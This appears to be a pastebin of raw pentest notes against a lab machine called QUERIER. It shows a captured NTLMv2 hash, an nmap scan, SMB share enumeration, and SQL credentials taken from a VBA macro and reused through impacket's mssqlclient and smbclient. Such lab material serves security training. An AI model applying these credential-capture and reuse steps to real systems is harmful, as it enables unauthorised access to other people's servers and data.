Untitled
Mar 8th, 2019
  1. [SMBv2] NTLMv2-SSP Client : 10.10.10.125
  2. [SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
  3. [SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER: ae754b1a0fe95a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
  4. [*] Skipping previously captured hash for QUERIER\mssql-svc
  5. [SMBv2] NTLMv2-SSP Client : 10.10.10.125
  6. [SMBv2] NTLMv2-SSP Username : \gX
  7. [SMBv2] NTLMv2-SSP Hash : gX:::ee481ad063676eb2::
  8. [*] Skipping previously captured hash for \gX
  14. .SQL> select * from sysusers
  15. uid status name sid roles createdate updatedate altuid password gid environ hasdbaccess islogin isntname isntgroup isntuser issqluser isaliased issqlrole isapprole
  16. ----------- ----------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------- ---------- ----------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- ----------- ----------- ----------- ----------- ----------- ----------- ----------- -----------
  17. 0 0 public 01050000000000090400000083741b006749c04ba943c02702f2a762 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 0 NULL 0 0 0 0 0 0 0 1 0
  18. 1 12 dbo 010500000000000515000000e5cfd9d970fd97dacb23a5d1f4010000 NULL 2003-04-08 09:10:42 2019-01-29 00:09:44 NULL NULL 0 NULL 1 1 1 0 1 0 0 0 0
  19. 2 0 guest 00 NULL 2003-04-08 09:10:42 2003-04-08 09:10:42 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  20. 3 0 INFORMATION_SCHEMA NULL NULL 2009-04-13 12:59:11 2009-04-13 12:59:11 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  21. 4 0 sys NULL NULL 2009-04-13 12:59:11 2009-04-13 12:59:11 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  22. 5 12 reporting 010500000000000515000000e5cfd9d970fd97dacb23a5d1ea030000 NULL 2019-01-29 00:10:15 2019-01-29 00:10:15 NULL NULL 0 NULL 1 1 1 0 1 0 0 0 0
  23. 16384 0 db_owner 01050000000000090400000000000000000000000000000000400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16384 NULL 0 0 0 0 0 0 0 1 0
  24. 16385 0 db_accessadmin 01050000000000090400000000000000000000000000000001400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16385 NULL 0 0 0 0 0 0 0 1 0
  25. 16386 0 db_securityadmin 01050000000000090400000000000000000000000000000002400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16386 NULL 0 0 0 0 0 0 0 1 0
  26. 16387 0 db_ddladmin 01050000000000090400000000000000000000000000000003400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16387 NULL 0 0 0 0 0 0 0 1 0
  27. 16389 0 db_backupoperator 01050000000000090400000000000000000000000000000005400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16389 NULL 0 0 0 0 0 0 0 1 0
  28. 16390 0 db_datareader 01050000000000090400000000000000000000000000000006400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16390 NULL 0 0 0 0 0 0 0 1 0
  29. 16391 0 db_datawriter 01050000000000090400000000000000000000000000000007400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16391 NULL 0 0 0 0 0 0 0 1 0
  30. 16392 0 db_denydatareader 01050000000000090400000000000000000000000000000008400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16392 NULL 0 0 0 0 0 0 0 1 0
  31. 16393 0 db_denydatawriter 01050000000000090400000000000000000000000000000009400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16393 NULL 0 0 0 0 0 0 0 1 0
  32. SQL> Traceback (most recent call last):
  33. File "./mssqlclient.py", line 188, in <module>
  34. shell.cmdloop()
  35. File "/usr/lib/python2.7/cmd.py", line 130, in cmdloop
  36. line = raw_input(self.prompt)
  37.  
  38.  
  39. /mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  40.  
  41. ./mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  42.  
  43.  
  44.  
  45. qq@z:~/Downloads/impacket/examples$ ./mssqlclient.py -windows-auth QUERIER.local/reporting:PcwTWTHRwryjc$c6@10.10.10.125
  46.  
  47. ./mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  48.  
  49. PcwTWTHRwryjc$c6
  50.  
  51. qq@z:~/Downloads/impacket/examples$ ./smbclient.py 10.10.10.125
  52. Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
  53.  
  54. Type help for list of commands
  55. # login reporting
  56. Password:
  57. [*] USER Session Granted
  58. # use C$
  59. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  60. # shares
  61. ADMIN$
  62. C$
  63. IPC$
  64. Reports
  65. # use ADMIN$
  66. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  67. # use C$
  68. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  69. # use IPC$
  70. # ls
  71. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 InitShutdown
  72. -rw-rw-rw- 5 Mon Jan 1 11:55:44 1601 lsass
  73. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 ntsvcs
  74. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 scerpc
  75. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-324-0
  76. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 epmapper
  77. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-1c8-0
  78. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 LSM_API_service
  79. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 eventlog
  80. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-3dc-0
  81. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 atsvc
  82. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-3b4-0
  83. -rw-rw-rw- 5 Mon Jan 1 11:55:44 1601 wkssvc
  84. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-258-0
  85. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 spoolss
  86. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-5c0-0
  87. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 winreg
  88. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 trkwks
  89. -rw-rw-rw- 4 Mon Jan 1 11:55:44 1601 srvsvc
  90. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 vgauth-service
  91. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-634-0
  92. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 ROUTER
  93. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 W32TIME_ALT
  94. -rw-rw-rw- 7 Mon Jan 1 11:55:44 1601 SQLLocal\MSSQLSERVER
  95. -rw-rw-rw- 2 Mon Jan 1 11:55:44 1601 sql\query
  96. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-250-0
  97. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 PSHost.131965566707989647.3216.DefaultAppDomain.powershell
  98. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 PSHost.131965567825779064.964.DefaultAppDomain.powershell
  99. #
  124. qq@z:~/Downloads/impacket$ python ./mssqlclient.py QUERIER/reporting:PcwTWTHRwryjc$c6@10.10.10.125
  125. Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
  126.  
  127. [*] Encryption required, switching to TLS
  128. [-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.
  129. qq@z:~/Downloads/impacket$
  130.  
  131. Line 105: User does not have permission to perform this action
  132.  
  133. Can get into 10.10.10.25/IPC$ with any account:
  134. gives error:
  135. NT_STATUS_INVALID_INFO_CLASS listing \*
  136.  
  137. =
  138.  
  139. ERRbadpipe
  140.  
  141. STATUS_INVALID_INFO_CLASS
  142. Invalid named pipe.
  143.  
  144.  
  145. Potential SQL account:
  146. Uid=reporting;
  147. Pwd=PcwTWTHRwryjc$c6
  148. Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
  149.  
  150.  
  151.  
  152. Rem Attribute VBA_ModuleType=VBADocumentModule
  153. Option VBASupport 1
  154.  
  155. ' macro to pull data for client volume reports
  156. '
  157. ' further testing required
  158.  
  159. Private Sub Connect()
  160.  
  161. Dim conn As ADODB.Connection
  162. Dim rs As ADODB.Recordset
  163.  
  164. Set conn = New ADODB.Connection
  165. conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
  166. conn.ConnectionTimeout = 10
  167. conn.Open
  168.  
  169. If conn.State = adStateOpen Then
  170.  
  171. ' MsgBox "connection successful"
  172.  
  173. 'Set rs = conn.Execute("SELECT * @@version;")
  174. Set rs = conn.Execute("SELECT * FROM volume;")
  175. Sheets(1).Range("A1").CopyFromRecordset rs
  176. rs.Close
  177.  
  178. End If
  179.  
  180. End Sub
  181.  
  182.  
  183.  
  184. qq@z:/$ smbclient //10.10.10.125/Reports -I
  185. Enter WORKGROUP\qq's password:
  186. Try "help" to get a list of possible commands.
  187. smb: \>
  188.  
  189.  
  190.  
  191.  
  192.  
  193. qq@z:/$ smbclient -L 10.10.10.125
  194. Enter WORKGROUP\qq's password:
  195.  
  196. Sharename Type Comment
  197. --------- ---- -------
  198. ADMIN$ Disk Remote Admin
  199. C$ Disk Default share
  200. IPC$ IPC Remote IPC
  201. Reports Disk
  202. Reconnecting with SMB1 for workgroup listing.
  203. Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
  204. Failed to connect with SMB1 -- no workgroup available
  205. qq@z:/$
  206.  
  207.  
  208.  
  209. Windows SMB: 139/445
  210.  
  211. PORT STATE SERVICE VERSION
  212. 135/tcp open msrpc Microsoft Windows RPC
  213. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  214. 445/tcp open microsoft-ds?
  215. 593/tcp filtered http-rpc-epmap
  216. 1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000
  217. 1521/tcp filtered oracle
  218. 1718/tcp filtered h323gatedisc
  219. 5999/tcp filtered ncd-conf
  220. 6779/tcp filtered unknown
  221. 10024/tcp filtered unknown